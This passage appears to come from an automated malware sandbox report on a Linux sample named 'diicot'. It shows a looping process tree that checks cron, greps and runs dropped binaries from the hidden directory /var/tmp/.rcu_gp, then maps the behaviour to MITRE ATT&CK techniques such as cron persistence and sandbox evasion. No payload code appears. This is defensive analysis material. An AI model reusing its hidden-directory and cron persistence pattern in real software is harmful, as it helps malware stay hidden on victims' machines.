  - Executes dropped EXE
  PID:2676
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2677
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2678
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2679
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2680
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2681
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2682
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2683
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2684
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2685
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2686
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2687
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2688
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2689
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2690
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2691
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2692
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2693
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2694
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2695
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2696
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2697
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2698
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2699
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2700
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2701
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2703
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2702
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2704
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2705
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2706
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2707
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2708
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2709
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2710
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2711
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2712
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2713
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2715
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2714
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2716
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2717
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2718
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2719
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2720
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2721
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2722
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2723
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2724
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2725
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2726
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2727
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2728
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2729
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2730
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2731
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2732
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2733
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2734
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2735
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2736
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2737
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2738
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2739
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2740
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2741
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2742
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2743
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2744
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2745
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2746
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2747
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2748
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2749
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2750
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2751
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2752
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2753
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2754
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2755
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2756
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2757
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2758
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2759
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2760
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2761
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2762
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2763
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2764
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2765
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2766
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2767
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2768
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2769
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2770
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2771
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2772
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2773
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2774
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2775
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2776
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2777
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2778
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:2779
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2780
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2781
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2782
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2783
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2784
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2785
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2786
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2787
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2788
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2789
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2790
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2791
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2792
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2793
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2794
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2795
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2796
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2797
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2798
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2799
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2800
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2816
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2817
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2818
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2819
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2820
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2821
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2822
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2823
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2824
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2825
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2826
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2827
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2828
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2829
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2830
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2831
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2832
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2833
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2834
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2835
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2836
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2837
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2838
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2839
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2843
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2844
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2845
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2846
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2847
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2848
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2849
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2850
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2851
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2852
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2853
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2854
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2855
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2856
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2857
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2858
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2859
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2860
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2861
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2862
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2863
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2864
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2865
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2866
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2867
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2868
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2869
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2870
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2871
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2872
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2874
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2875
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2876
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2877
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2878
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2879

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2529

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Persistence

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion

T1497

System Checks